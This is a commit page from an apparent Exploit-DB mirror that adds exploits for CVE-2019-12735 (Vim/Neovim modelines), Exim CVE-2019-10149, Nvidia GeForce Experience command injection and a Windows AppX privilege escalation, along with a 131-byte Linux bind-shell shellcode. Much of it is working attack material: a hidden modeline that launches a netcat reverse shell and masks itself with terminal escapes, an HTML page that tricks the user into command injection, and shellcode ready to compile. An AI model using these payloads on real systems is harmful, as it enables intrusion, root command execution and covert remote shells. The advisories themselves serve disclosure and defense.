bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-06-08

Browse source 
5 changes to exploits/shellcodes

Nvidia GeForce Experience Web Helper - Command Injection
Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution
Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)

Exim 4.87 < 4.91 - (Local / Remote) Command Execution

Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)
This commit is contained in:
Offensive Security 2019-06-08 05:01:56 +00:00
parent 35d500a3cb
commit 85fbab2de4
7 changed files with 557 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

142
exploits/linux/local/46973.md Normal file
View file

@ -0,0 +1,142 @@
*by Arminius ([@rawsec](https://twitter.com/rawsec))*
Vim/Neovim Arbitrary Code Execution via Modelines
=================================================
```
Product: Vim < 8.1.1365, Neovim < 0.3.6
Type: Arbitrary Code Execution
CVE: CVE-2019-12735
Date: 2019-06-04
Author: Arminius (@rawsec)
```
Summary
-------
Vim before 8.1.1365 and Neovim before 0.3.6 are vulnerable to arbitrary code
execution via modelines by opening a specially crafted text file.
Proof of concept
----------------
- Create [`poc.txt`](../data/2019-06-04_ace-vim-neovim/poc.txt):
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
- Ensure that the modeline option has not been disabled (`:set modeline`).
- Open the file in Vim:
$ vim poc.txt
- The system will execute `uname -a`.
Proof of concept 2 (reverse shell)
----------------------------------
This PoC outlines a real-life attack approach in which a reverse shell
is launched once the user opens the file. To conceal the attack, the file will
be immediately rewritten when opened. Also, the PoC uses terminal escape
sequences to hide the modeline when the content is printed with `cat`. (`cat
-v` reveals the actual content.)
[`shell.txt`](../data/2019-06-04_ace-vim-neovim/shell.txt):
\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n
Demo (victim left, attacker right):
![Reverse shell demo](https://i.imgur.com/8w4tteX.gif)
Details
-------
The modeline feature allows to specify custom editor options near the start or
end of a file. This feature is enabled by default and applied to all file types,
including plain `.txt`. A typical modeline:
/* vim: set textwidth=80 tabstop=8: */
For security reasons, only a subset of options is permitted in modelines, and
if the option value contains an expression, it is executed in a sandbox: [[1]]
No other commands than "set" are supported, for security reasons (somebody
might create a Trojan horse text file with modelines). And not all options
can be set. For some options a flag is set, so that when it's used the
|sandbox| is effective.
The sandbox is meant to prevent side effects: [[2]]
The 'foldexpr', 'formatexpr', 'includeexpr', 'indentexpr', 'statusline' and
'foldtext' options may be evaluated in a sandbox. This means that you are
protected from these expressions having nasty side effects. This gives some
safety for when these options are set from a modeline.
However, the `:source!` command (with the bang [`!`] modifier) can be used to
bypass the sandbox. It reads and executes commands from a given file as if
*typed manually*, running them after the sandbox has been left. [[3]]
:so[urce]! {file} Read Vim commands from {file}. These are commands
that are executed from Normal mode, like you type
them.
Thus, one can trivially construct a modeline that runs code outside the sandbox:
# vim: set foldexpr=execute('\:source! some_file'):
An additional step is needed for Neovim which blacklists `execute()`: [[4]]
execute({command} [, {silent}]) *execute()*
Execute {command} and capture its output.
[...]
This function is not available in the |sandbox|.
Here, `assert_fails()` can be used instead, which takes a `{cmd}` argument, too: [[5]]
assert_fails({cmd} [, {error} [, {msg}]]) *assert_fails()*
Run {cmd} and add an error message to |v:errors| if it does
NOT produce an error.
The following modeline utilizes a fold expression to run `source! %` to
execute the current file, which in turn executes `uname -a || "(garbage)"` as a
shell command:
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
Additionally, the Neovim-only function `nvim_input()` is vulnerable to the same
approach via e.g.:
vi:fen:fdm=expr:fde=nvim_input("\:terminal\ uname\ -a"):fdl=0
(In the past, other modeline-related vulnerabilities have been patched in Vim - see [CVE-2002-1377](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1377), [CVE-2016-1248](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248).)
Patches
-------
- [Vim patch 8.1.1365](https://github.com/vim/vim/commit/5357552)
- [Neovim patch](https://github.com/neovim/neovim/pull/10082) (released in [v0.3.6](https://github.com/neovim/neovim/releases/tag/v0.3.6))
Beyond patching, it's recommended to disable modelines in the vimrc (`set
nomodeline`), to use the [securemodelines](https://github.com/ciaranm/securemodelines/)
plugin, or to disable `modelineexpr` (since patch 8.1.1366, Vim-only) to disallow
expressions in modelines.
Timeline
--------
- 2019-05-22 Vim and Neovim maintainers notified
- 2019-05-23 Vim patch released
- 2019-05-29 Neovim patch released
- 2019-06-05 CVE ID CVE-2019-12735 assigned
Also see description of [CVE-2019-12735](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735).
[1]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/options.txt#L582
[2]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/eval.txt#L13050
[3]: https://github.com/vim/vim/blob/5c017b2de28d19dfa4af58b8973e32f31bb1477e/runtime/doc/repeat.txt#L182
[4]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L3247
[5]: https://github.com/neovim/neovim/blob/1060bfd0338253107deaac346e362a9feab32068/runtime/doc/eval.txt#L2494
[6]: https://github.com/vim/vim/releases/tag/v8.1.1365
[7]: https://github.com/neovim/neovim/releases/tag/v0.3.6

157
exploits/linux/remote/46974.txt Normal file
View file

@ -0,0 +1,157 @@
Qualys Security Advisory
The Return of the WIZard: RCE in Exim (CVE-2019-10149)
========================================================================
Contents
========================================================================
Summary
Local exploitation
Remote exploitation
- Non-default configurations
- Default configuration
Acknowledgments
Timeline
Boromir: "What is this new devilry?"
Gandalf: "A Balrog. A demon of the Ancient World."
-- The Lord of the Rings: The Fellowship of the Ring
========================================================================
Summary
========================================================================
During a code review of the latest changes in the Exim mail server
(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability
in versions 4.87 to 4.91 (inclusive). In this particular case, RCE means
Remote *Command* Execution, not Remote Code Execution: an attacker can
execute arbitrary commands with execv(), as root; no memory corruption
or ROP (Return-Oriented Programming) is involved.
This vulnerability is exploitable instantly by a local attacker (and by
a remote attacker in certain non-default configurations). To remotely
exploit this vulnerability in the default configuration, an attacker
must keep a connection to the vulnerable server open for 7 days (by
transmitting one byte every few minutes). However, because of the
extreme complexity of Exim's code, we cannot guarantee that this
exploitation method is unique; faster methods may exist.
Exim is vulnerable by default since version 4.87 (released on April 6,
2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and
older versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled
manually. Surprisingly, this vulnerability was fixed in version 4.92
(released on February 10, 2019):
https://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...
https://bugs.exim.org/show_bug.cgi?id=2310
but was not identified as a security vulnerability, and most operating
systems are therefore affected. For example, we exploit an up-to-date
Debian distribution (9.9) in this advisory.
========================================================================
Local exploitation
========================================================================
The vulnerable code is located in deliver_message():
6122 #ifndef DISABLE_EVENT
6123 if (process_recipients != RECIP_ACCEPT)
6124 {
6125 uschar * save_local = deliver_localpart;
6126 const uschar * save_domain = deliver_domain;
6127
6128 deliver_localpart = expand_string(
6129 string_sprintf("${local_part:%s}", new->address));
6130 deliver_domain = expand_string(
6131 string_sprintf("${domain:%s}", new->address));
6132
6133 (void) event_raise(event_action,
6134 US"msg:fail:internal", new->message);
6135
6136 deliver_localpart = save_local;
6137 deliver_domain = save_domain;
6138 }
6139 #endif
Because expand_string() recognizes the "${run{<command> <args>}}"
expansion item, and because new->address is the recipient of the mail
that is being delivered, a local attacker can simply send a mail to
"${run{...}}@localhost" (where "localhost" is one of Exim's
local_domains) and execute arbitrary commands, as root
(deliver_drop_privilege is false, by default):
[...]
========================================================================
Remote exploitation
========================================================================
Our local-exploitation method does not work remotely, because the
"verify = recipient" ACL (Access-Control List) in Exim's default
configuration requires the local part of the recipient's address (the
part that precedes the @ sign) to be the name of a local user:
[...]
------------------------------------------------------------------------
Non-default configurations
------------------------------------------------------------------------
We eventually devised an elaborate method for exploiting Exim remotely
in its default configuration, but we first identified various
non-default configurations that are easy to exploit remotely:
- If the "verify = recipient" ACL was removed manually by an
administrator (maybe to prevent username enumeration via RCPT TO),
then our local-exploitation method also works remotely.
- If Exim was configured to recognize tags in the local part of the
recipient's address (via "local_part_suffix = +* : -*" for example),
then a remote attacker can simply reuse our local-exploitation method
with an RCPT TO "balrog+${run{...}}@localhost" (where "balrog" is the
name of a local user).
- If Exim was configured to relay mail to a remote domain, as a
secondary MX (Mail eXchange), then a remote attacker can simply reuse
our local-exploitation method with an RCPT TO "${run{...}}@khazad.dum"
(where "khazad.dum" is one of Exim's relay_to_domains). Indeed, the
"verify = recipient" ACL can only check the domain part of a remote
address (the part that follows the @ sign), not the local part.
------------------------------------------------------------------------
Default configuration
------------------------------------------------------------------------
[...]
========================================================================
Acknowledgments
========================================================================
We thank Exim's developers, Solar Designer, and the members of
distros@openwall.
"The Return of the WIZard" is a reference to Sendmail's ancient WIZ and
DEBUG vulnerabilities:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0145
https://seclists.org/bugtraq/1995/Feb/56
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0095
http://www.cheswick.com/ches/papers/berferd.pdf
========================================================================
Timeline
========================================================================
2019-05-27: Advisory sent to security@exim.
2019-05-28: Advisory sent to distros@openwall.

66
exploits/windows/local/46972.html Normal file
View file

@ -0,0 +1,66 @@
<!--
POC for CVE20195678 Nvidia GeForce Experience OS command injection via a web browser
Author: David Yesland -- Rhino Security Labs
-->
<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</head>
<body>
<script>
//Send request to local GFE server
function submitRequest(port,secret)
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/127.0.0.1:"+port+"\/gfeupdate\/autoGFEInstall\/", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text\/html");
xhr.setRequestHeader("X_LOCAL_SECURITY_COOKIE", secret);
var body = "\""+document.getElementById("cmd").value+"\"";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
$(document).on('change', '.file-upload-button', function(event) {
var reader = new FileReader();
reader.onload = function(event) {
var jsonObj = JSON.parse(event.target.result);
submitRequest(jsonObj.port,jsonObj.secret);
}
reader.readAsText(event.target.files[0]);
});
//Copy text from some text field
function myFunction() {
var copyText = document.getElementById("myInput");
copyText.select();
document.execCommand("copy");
}
//trigger the copy and file window on ctrl press
$(document).keydown(function(keyPressed) {
if (keyPressed.keyCode == 17) {
myFunction();document.getElementById('file-input').click();
}
});
</script>
<h2>
Press CTRL+V+Enter
</h2>
<!--Command to run in a hidden input field-->
<input type="hidden" value="calc.exe" id="cmd" size="55">
<!--Hidden text box to copy text from-->
<div style="opacity: 0.0;">
<input type="text" value="%LOCALAPPDATA%\NVIDIA Corporation\NvNode\nodejs.json"
id="myInput" size="1">
</div>
<!--file input-->
<input id="file-input" onchange="file_changed(this)" onclick="this.value=null;" accept="application/json" class='file-upload-button' type="file" name="name" style="display: none;" />
</body>
</html>

34
exploits/windows/local/46976.txt Normal file
View file

@ -0,0 +1,34 @@
CVE-2019-0841 BYPASS #2
There is a second bypass for CVE-2019-0841.
This can be triggered as following:
Delete all files and subfolders within "c:\users\%username%\appdata\local\packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\" (atleast the ones we can delete as user)
Try to launch edge. It will crash the first time.
When we launch it a second time, it will write the DACL while impersonating "SYSTEM".
The trick here is to launch edge by clicking it on the taskbar or desktop, using "start microsoft-edge:" seems to result in correct impersonation.
You can still do this completely programmatically.. since edge will always be in the same position in the task bar.. *cough* sendinput *cough*. There is probably other ways too.
Another note, this bug is most definitely not restricted to edge. This will be triggered with other packages too. So you can definitely figure out a way to trigger this bug silently without having edge pop up. Or you could probably minimize edge as soon as it launches and close it as soon as the bug completes. I think it will also trigger by just launching edge once, but sometimes you may have to wait a little. I didn't do extensive testing.. found this bug and quickly wrote up a poc, took me like 2 hours total, finding LPEs is easy.
To repro:
1. Launch my poc
2. Launch edge several times
Use video demo as guidance. Also, I don't get paid for dropping bugs, so if you want a simple and full exploit, then go fucking write it yourself, I have better things to do, such as preparing my voyage into the arctic. You're welcome.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Make sure you have multiple cores in your VM (not multiple processors, multiple cores).
It's going to increase the thread priority to increase our odds of winning the race condition that this exploits. If your VM freezes it means you either have 1 core or set your vm to have multiple processors instead of multiple cores... which will also cause it to lock up.
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46976.zip

4
files_exploits.csv
View file

@ -10539,6 +10539,9 @@ id,file,description,date,author,type,platform,port
46938,exploits/windows/local/46938.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)",2019-05-23,SandboxEscaper,local,windows,
46945,exploits/windows/local/46945.cpp,"Microsoft Windows 8.1/ Server 2012 - 'Win32k.sys' Local Privilege Escalation (MS14-058)",2014-11-24,anonymous,local,windows,
46962,exploits/windows/local/46962.py,"DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)",2019-06-04,"Kevin Randall",local,windows,
46972,exploits/windows/local/46972.html,"Nvidia GeForce Experience Web Helper - Command Injection",2019-06-03,"Rhino Security Labs",local,windows,
46973,exploits/linux/local/46973.md,"Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution",2019-06-04,Arminius,local,linux,
46976,exploits/windows/local/46976.txt,"Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)",2019-06-07,SandboxEscaper,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17483,6 +17486,7 @@ id,file,description,date,author,type,platform,port
46961,exploits/hardware/remote/46961.py,"Cisco RV130W 1.0.3.44 - Remote Stack Overflow",2019-06-04,@0x00string,remote,hardware,
46969,exploits/windows/remote/46969.rb,"IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)",2019-06-05,Metasploit,remote,windows,
46970,exploits/linux/remote/46970.rb,"LibreNMS - addhost Command Injection (Metasploit)",2019-06-05,Metasploit,remote,linux,
46974,exploits/linux/remote/46974.txt,"Exim 4.87 < 4.91 - (Local / Remote) Command Execution",2019-06-05,"Qualys Corporation",remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -967,3 +967,4 @@ id,file,description,date,author,type,platform
46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64
46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64

1 id file description date author type platform
967 46829 shellcodes/linux_x86/46829.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes) 2019-05-13 Xavi Beltran shellcode linux_x86
968 46870 shellcodes/linux_x86-64/46870.c Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes) 2019-05-20 Aron Mihaljevic shellcode linux_x86-64
969 46907 shellcodes/linux_x86-64/46907.c Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes) 2019-05-23 Rajvardhan shellcode linux_x86-64
970 46975 shellcodes/linux_x86-64/46975.c Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) 2019-06-07 Aron Mihaljevic shellcode linux_x86-64

153
shellcodes/linux_x86-64/46975.c Normal file
View file

@ -0,0 +1,153 @@
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 131 bytes
;github = https://github.com/STARRBOY
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"
================== ASSEMBLY ========================================
global _start
section .text
_start:
xor rsi, rsi ;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
;set rax and rdi to zero
create_socket:
;int socket(int domain, int type, int protocol);
push 41 ;sys_socket
pop rax
push 2
pop rdi
inc rsi ;SOCK_STREAM
xor rdx, rdx
syscall
;save the return value for future use
xchg rdi, rax
; sin_zero: 0
; sin_addr.s_addr: INADDR_ANY = 0
; sin_port: 4444
; sin_family: AF_INET = 2
xor rax, rax
push rax ; sin_zero
push rax ; zero out another 8 bytes for remaining members
mov word [rsp+2], 0x5c11 ; sin_port = 4444
mov byte [rsp], 0x2 ; sin_family
bind:
;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
xor rdx, rdx
push 49
pop rax
push rsp
pop rsi ;sockaddr stack pointer
add rdx, 16 ;sizeof sockaddr
syscall
listen:
;int listen(int sockfd, int backlog);
xor rsi, rsi
push 50 ;sys_listen
pop rax
inc rsi ;backlog = number of clients
syscall
accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
push 43 ;sys_accept
pop rax
mov rsi, rsp ; stack pointer for client sockaddr
mov byte [rsp-1], 0x10 ; put size of the structure on the stack
dec rsp ; adjust stack pointer for previous
mov rdx, rsp ; stack pointer for struct size
syscall
;save client socket
xchg r10, rax
close:
;int close(int fd);
push 3 ;sys_close
pop rax
push rax ;save 3 on the stack for rsi in dup2
syscall
xchg rdi, r10 ;client socket as first parameter for dup2
pop rsi
dup2loop:
;int dup2(int oldfd, int newfd);
push 33 ;sys_dup2
pop rax
dec rsi
syscall
loopnz dup2loop
spawn_shell:
;int execve(const char *filename, char *const argv[], char *const envp[]);
xor eax, eax
add al, 59 ;sys_execve
xor rdi, rdi ;set rdi to zero
push rdi ;push null on the stack
mov rdi, 0x68732F2f6e69622F ;bin//sh in reverse
push rdi
mov rdi, rsp ;set stack pointer to rdi
xor rsi, rsi ;rsi and rdx == 0
xor rdx, rdx
syscall
=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o
ld tcp_bind.o -o tcp_bind
=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind
======================C program=====================================
#include <stdio.h>
#include <string.h>
unsigned char shellcode[]=\
"\x48\x31\xf6\x6a\x29\x58\x6a\x02\x5f\x48\xff\xc6\x48"
"\x31\xd2\x0f\x05\x48\x97\x48\x31\xc0\x50\x50\x66\xc7"
"\x44\x24\x02\x11\x5c\xc6\x04\x24\x02\x48\x31\xd2\x6a"
"\x31\x58\x54\x5e\x48\x83\xc2\x10\x0f\x05\x48\x31\xf6"
"\x6a\x32\x58\x48\xff\xc6\x0f\x05\x6a\x2b\x58\x48\x89"
"\xe6\xc6\x44\x24\xff\x10\x48\xff\xcc\x48\x89\xe2\x0f"
"\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87\xfa\x5e"
"\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x31\xc0\x04"
"\x3b\x48\x31\xff\x57\x48\xbf\x2f\x62\x69\x6e\x2f\x2f"
"\x73\x68\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05";
int main(){
printf("length of your shellcode is: %d\n", (int)strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}